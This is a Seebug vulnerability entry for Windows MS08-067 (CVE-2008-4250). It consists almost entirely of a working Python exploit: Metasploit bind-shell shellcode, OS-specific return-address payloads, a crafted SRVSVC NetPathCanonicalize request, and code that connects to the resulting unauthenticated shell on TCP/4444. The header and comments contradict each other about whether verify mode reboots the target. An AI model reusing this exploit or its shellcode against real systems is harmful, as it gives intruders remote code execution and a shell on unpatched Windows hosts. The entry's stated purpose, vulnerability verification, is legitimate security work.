Windows ms08-067 缓冲区溢出漏洞

2012-10-15T00:00:00
ID SSV:88222
Type seebug
Reporter Root
Modified 2012-10-15T00:00:00

Description

No description provided by source. (From the attached script: this is a working proof-of-concept for MS08-067 / CVE-2008-4250. It sends a crafted NetPathCanonicalize request to the Server service over the `\pipe\browser` named pipe and confirms exploitation by connecting to the bind shell its payload opens on TCP/4444. It is a live exploit, not a passive check — and as written, "verify" mode sends `shutdown /r /t 0` to the spawned shell, rebooting the target. Use only against systems you are authorized to test.)

                                        
                                            
                                                #!/usr/bin/env python 
# coding=utf-8

import socket
import struct
import sys
import time
from threading import Thread    #Thread is imported incase you would like to modify the src to run against multiple targets
from urlparse import urlparse
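try:
	from impacket import smb
	from impacket import uuid
	from impacket.dcerpc import dcerpc
	from impacket.dcerpc import transport
except ImportError:
	# Impacket (and the PyCrypto it depended on at the time) must be present;
	# exit non-zero so the calling framework sees the failure rather than a
	# half-initialised plugin.  Only ``uuid`` and ``transport`` are referenced
	# below; ``smb`` and ``dcerpc`` are imported but not used in this file.
	# The download URLs date from 2012 and may no longer resolve.
	# ``except ... as`` / print() with one argument are valid on both
	# Python 2.6+ and 3, unlike the original ``except X, _`` / print statement.
	print('Install the following library to make this script work')
	print('Impacket : http://oss.coresecurity.com/projects/impacket.html')
	print('PyCrypto : http://www.amk.ca/python/code/crypto.html')
	sys.exit(1)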

from comm import cmdline
from comm import generic

# Plugin metadata.  Nothing in this file reads it; presumably the comm
# framework (cmdline/generic) does, for display and bookkeeping.  'Desc' is
# empty in the source -- the CVE reference is the only vulnerability
# write-up carried here.
poc_info={
    'VulId'       : '0866',
    'Name'        : 'Windows ms08-067 缓冲区溢出漏洞 POC',
    'AppName'     : 'Windows',
    'AppPowerLink': '',
    'AppVersion'  : '',
    'VulType'     : 'Buffer Overflow',
    'Desc'        : '''''',
    'Author'      : ['niubl @ Knowsec'],
    'VulDate'     : '2008-10-22',
    'CreateDate'  : '2014-01-06',
    'UpdateDate'  : '2014-01-06',
    'References'  : ['http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250'],
    'Version'     : '1',
}
# Shared in/out dictionary: cmdline.main() fills the inputs from argv,
# main() writes the outputs, generic.output() renders it at the end.
io_info = {
    'URL'     : '',   # target; main() derives the SMB host from it via urlparse()
    'Mode'    : 'v',  # 'v' = verify (confirm the shell answers), 'a' = attack (report the bind shell)
    'Verbose' : False, # extra diagnostics: init banner in __main__, error detail in main()
    'Error'   : '',    # failure text recorded by main() (str of the exception)
    'Status'  : 0,     # set to 1 once the cmd.exe banner is read back from TCP/4444
    'Result'  : {}     # 'VerifyInfo' (mode v) or 'ShellInfo' (mode a) sub-dict
}

#Portbind shellcode from metasploit; Binds port to TCP port 4444
# 16-byte NOP sled + 344 bytes of shellcode = 360 bytes.  The two 0xd6
# string counts in SRVSVC_Exploit.__DCEPacket are hand-computed from this
# length (360 + 64 filler + 4 NUL = 428 bytes = 214 UTF-16 units); a
# replacement shellcode of a different size needs those counts recomputed.
# The listener performs no authentication: anyone who can reach TCP/4444
# on the target gets the shell, presumably in the security context of the
# exploited Server service.  Both 'v' and 'a' modes use this same payload.
shellcode_verify  = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode_verify += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9"
shellcode_verify += "\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56"
shellcode_verify += "\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22"
shellcode_verify += "\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30"
shellcode_verify += "\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81"
shellcode_verify += "\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42"
shellcode_verify += "\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22"
shellcode_verify += "\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9"
shellcode_verify += "\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79"
shellcode_verify += "\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab"
shellcode_verify += "\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa"
shellcode_verify += "\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48"
shellcode_verify += "\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1"
shellcode_verify += "\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0"
shellcode_verify += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe"
shellcode_verify += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9"
shellcode_verify += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84"
shellcode_verify += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56"
shellcode_verify += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8"
shellcode_verify += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79"
shellcode_verify += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6"
shellcode_verify += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9"

#Payload for Windows 2000 target
# 92 bytes.  Opens with the UTF-16 string "A\..\..\" -- the relative-path
# sequence whose canonicalisation MS08-067 gets wrong -- then filler, a
# short x86 sequence (\x8b\xc4 \x66\x05\x94\x04 \x8b\x00 \xff\xe0 appears to
# decode to mov eax,esp / add ax,0x494 / mov eax,[eax] / jmp eax, i.e. a
# trampoline into the shellcode), more filler, a short backward jump
# (\xeb\xcc) and a UTF-16 NUL.
# NOTE: main() always constructs SRVSVC_Exploit with osver=2, so this
# Windows 2000 payload is never selected by the script as written.
payload_1='\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41\x41\x41\x41\x41\x41\x41'
payload_1+='\x41\x41'
payload_1+='\x2f\x68\x18\x00\x8b\xc4\x66\x05\x94\x04\x8b\x00\xff\xe0'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\x43\x43\x43\x43\x43\x43\x43\x43'
payload_1+='\xeb\xcc'
payload_1+='\x00\x00'

#Payload for Windows 2003[SP2] target
# 92 bytes, same "A\..\..\" prefix.  The little-endian dwords such as
# \x0a\x32\xbb\x77 (0x77bb320a) appear to be addresses hard-coded for the
# author's Windows 2003 SP2 build; a different service pack or language
# build has different addresses, and the request will then most likely
# crash the Server service rather than run the shellcode -- there is no
# target fingerprinting anywhere in this script.  The 0x2f string count in
# SRVSVC_Exploit.__DCEPacket (47 UTF-16 units = 94 bytes) is hand-computed
# from this length plus the NUL bytes appended after it.
payload_2='\x41\x00\x5c\x00'
payload_2+='\x2e\x00\x2e\x00\x5c\x00\x2e\x00'
payload_2+='\x2e\x00\x5c\x00\x0a\x32\xbb\x77'
payload_2+='\x8b\xc4\x66\x05\x60\x04\x8b\x00'
payload_2+='\x50\xff\xd6\xff\xe0\x42\x84\xae'
payload_2+='\xbb\x77\xff\xff\xff\xff\x01\x00'
payload_2+='\x01\x00\x01\x00\x01\x00\x43\x43'
payload_2+='\x43\x43\x37\x48\xbb\x77\xf5\xff'
payload_2+='\xff\xff\xd1\x29\xbc\x77\xf4\x75'
payload_2+='\xbd\x77\x44\x44\x44\x44\x9e\xf5'
payload_2+='\xbb\x77\x54\x13\xbf\x77\x37\xc6'
payload_2+='\xba\x77\xf9\x75\xbd\x77\x00\x00'

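class SRVSVC_Exploit(Thread):
	"""One MS08-067 (CVE-2008-4250) trigger against a single SMB host.

	``run()`` connects to the SRVSVC interface over the ``\\pipe\\browser``
	named pipe, binds, and sends a single NetPathCanonicalize (opnum 0x1f)
	request whose arguments carry the bind-shell shellcode and the
	OS-specific return-address payload.  The request is only sent, never
	read back: success is observed by the caller connecting to the port the
	shellcode opens (TCP/4444 for ``shellcode_verify``).

	Parameters:
		target -- host name or IP of the SMB server.
		osver  -- 1 selects ``payload_1`` (Windows 2000), 2 selects
		          ``payload_2`` (Windows 2003 SP2); anything else raises
		          ValueError at construction instead of a NameError later.
		          The return addresses in those payloads are hard-coded, so
		          the target presumably has to be the exact build they were
		          made for.
		mode   -- 'v' (verify) or 'a' (attack).  Both currently select the
		          same shellcode; the parameter is kept for callers.
		port   -- stored but not handed to the transport (see __DCEPacket).

	Attributes:
		error  -- None, or the exception raised inside ``run()``.  A thread
		          cannot propagate exceptions to its starter, so it is kept
		          here for the caller to inspect after ``join()``.
	"""

	def __init__(self, target, osver, mode, port=445):
		super(SRVSVC_Exploit, self).__init__()
		self.__port = port
		self.target = target
		self.osver = osver
		self.error = None
		# The original stored the selection in a module-level ``global
		# payload``, so two instances with different osver values (the
		# multi-target use the Thread base class invites) would clobber each
		# other.  Keep it per instance.
		if osver == 1:
			self.payload = payload_1
		elif osver == 2:
			self.payload = payload_2
		else:
			raise ValueError('unsupported osver %r (expected 1 or 2)' % (osver,))
		if mode in ('v', 'a'):
			self.shellcode = shellcode_verify
		else:
			raise ValueError("unsupported mode %r (expected 'v' or 'a')" % (mode,))

	@staticmethod
	def _build_stub(shellcode, payload):
		"""Return the raw NDR stub for the NetPathCanonicalize request.

		The byte layout is identical to the original exploit.  It appears to
		be: a referent id, a conformant/varying UTF-16 string of 0xd6 = 214
		units (428 bytes) made of ``shellcode`` + 64 filler bytes + 4 NULs
		(this matches the 360-byte ``shellcode_verify`` -- the counts are NOT
		derived from the arguments, so a shellcode of another length needs
		them recomputed), a second string of 0x2f = 47 units (94 bytes)
		holding the 92-byte ``payload`` plus NULs, and then the remaining
		fixed-size arguments of the call.
		"""
		parts = [
			'\x01\x00\x00\x00',                                   # referent id
			'\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00',   # max count / offset / actual count = 214
			shellcode,
			'\x41' * 64,                                          # filler
			'\x00\x00\x00\x00',
			'\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00',   # max count / offset / actual count = 47
			payload,
			'\x00\x00\x00\x00',
			'\x02\x00\x00\x00\x02\x00\x00\x00',
			'\x00\x00\x00\x00\x02\x00\x00\x00',
			'\x5c\x00\x00\x00\x01\x00\x00\x00',
			'\x01\x00\x00\x00',
		]
		return ''.join(parts)

	def __DCEPacket(self):
		"""Open the named-pipe transport, bind to SRVSVC and build the stub."""
		# NOTE(review): self.__port is never handed to the transport; the
		# string binding below connects on impacket's default SMB port.  Pass
		# it through the transport's port setter if this impacket version
		# offers one -- TODO confirm.
		self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target)
		self.__trans.connect()
		self.__dce = self.__trans.DCERPC_class(self.__trans)
		# SRVSVC interface UUID, version 3.0.
		self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
		self.__stub = self._build_stub(self.shellcode, self.payload)

	def run(self):
		"""Send the crafted NetPathCanonicalize request (opnum 0x1f = 31)."""
		try:
			self.__DCEPacket()
			self.__dce.call(0x1f, self.__stub)
		except Exception as e:
			# Keep the failure for the starter instead of losing it to the
			# thread's default traceback printer.
			self.error = e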

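# The original raced the exploit thread (it probed TCP/4444 the instant the
# thread started) and used blocking sockets with no timeout, so a dead host
# could hang the scan for ever.  Give the request time to go out, then probe
# with a bounded connect/recv timeout and a short retry schedule.
_EXPLOIT_SEND_TIMEOUT = 30.0
_SHELL_PORT = 4444              # port opened by shellcode_verify
_SHELL_BANNER = 'Microsoft Windows'

def _target_host(url):
	'''Return the host to attack from the framework's URL field.

	The original used urlparse(url).netloc, which is '' for a scheme-less
	target (so socket.connect failed) and keeps any ':port' suffix.
	.hostname strips the port and IPv6 brackets; a scheme-less value falls
	back to everything before the first '/'.
	'''
	host = urlparse(url).hostname
	if not host:
		host = url.split('/')[0]
	return host

def _connect_shell(host, port=_SHELL_PORT, attempts=5, delay=1.0, timeout=5.0):
	'''Connect to the bind shell, retrying while the exploit lands.

	Returns a connected socket with `timeout` set for later recv() calls.
	Raises the last socket.error after `attempts` failures.
	'''
	last_err = socket.error('no connection attempts made')
	for _ in range(attempts):
		s = socket.socket()
		s.settimeout(timeout)
		try:
			s.connect((host, port))
			return s
		except socket.error as e:
			last_err = e
			s.close()
			time.sleep(delay)
	raise last_err

def _read_banner(sock, marker=_SHELL_BANNER, max_bytes=4000):
	'''Read from the shell until `marker` is seen, the peer closes, the
	socket times out or `max_bytes` arrived; return what was received.

	The original did exactly two recv(2000) calls, which blocks for ever if
	the whole banner arrives in the first chunk and cmd.exe then sits
	waiting for input.
	'''
	data = ''
	while marker not in data and len(data) < max_bytes:
		try:
			chunk = sock.recv(2000)
		except socket.timeout:
			break
		if not chunk:
			break
		data += chunk
	return data

def main(io_info):
	'''interface function, io_info is a global io dict

	Inputs: io_info['URL'] (target host, see _target_host), 'Mode' ('v'
	verify / 'a' attack; anything else is a no-op) and 'Verbose'.  Fires
	SRVSVC_Exploit with the Windows 2003 SP2 payload (osver=2, as the
	original hard-codes), then connects to the bind shell on TCP/4444 and
	looks for the cmd.exe banner.  On success sets io_info['Status'] to 1
	and fills io_info['Result'] ('VerifyInfo' or 'ShellInfo'); on failure
	leaves Status alone and puts the reason in io_info['Error'] (the
	original recorded it only when Verbose was set).

	This is a live exploit, not a passive check: the request executes code
	inside the Server service.  Verify mode used to send
	`shutdown /r /t 0` to the shell, REBOOTING the target as part of a
	supposedly read-only check; it now only closes the spawned cmd.exe.
	Whether the host needs a restart afterwards is the operator's call.
	'''
	url = io_info.get('URL', '')
	mode = io_info.get('Mode', 'v')
	verbose = io_info.get('Verbose', False)
	# Irrelevant for SMB, but retained: the framework may rely on the call
	# having been made (judging by its signature it works on io_info).
	headers_fake = generic.modify_headers(io_info)
	target = _target_host(url)
	if mode not in ('v', 'a'):
		return

	current = SRVSVC_Exploit(target, 2, mode)
	current.start()
	current.join(_EXPLOIT_SEND_TIMEOUT)
	# Newer SRVSVC_Exploit records its failure in .error; older ones do not.
	thread_err = getattr(current, 'error', None)

	s = None
	try:
		s = _connect_shell(target)
		data = _read_banner(s)
		if mode == 'v':
			# Close the cmd.exe we just confirmed instead of rebooting the
			# host.  Whether the listener itself goes away depends on the
			# shellcode's exit method; the port may stay bound until the
			# operator cleans up.
			s.send('exit\r\n')
		if _SHELL_BANNER in data:
			io_info['Status'] = 1
			if mode == 'v':
				io_info['Result']['VerifyInfo'] = {}
				io_info['Result']['VerifyInfo']['VerifyInfo'] = target
			else:
				# NOTE(review): this connection already consumed one accept on
				# the bind shell.  Whether it accepts another after we close
				# depends on the shellcode (a single-accept bind shell would
				# not) -- confirm before relying on the hint below.  The shell
				# is unauthenticated: anyone reaching the port gets it.
				io_info['Result']['ShellInfo'] = {}
				io_info['Result']['ShellInfo']['URL'] = target
				io_info['Result']['ShellInfo']['Content'] = 'nc host 4444, then you can get a shell'
		else:
			io_info['Error'] = 'no cmd.exe banner from %s:%d' % (target, _SHELL_PORT)
	except Exception as e:
		io_info['Error'] = str(e)
	finally:
		if s is not None:
			s.close()
	# A failed exploit thread is the likeliest root cause of a failed probe;
	# attach it on failure, or always when verbose.
	if thread_err is not None and (verbose or io_info.get('Status', 0) != 1):
		io_info['Error'] = '%s (exploit thread: %s)' % (io_info.get('Error', ''), thread_err)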
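if __name__=="__main__":
	# Command-line entry: comm.cmdline fills io_info (URL/Mode/Verbose) from
	# argv, main() runs the exploit, generic.output() formats the result.
	cmdline.main(io_info, usage='', argvs=[])
	if io_info['Verbose']:
		# print() with a single argument behaves identically on Python 2 and
		# 3, unlike the original print statement.
		print('\n[*] Init ...\n')
	main(io_info)
	print(generic.output(io_info))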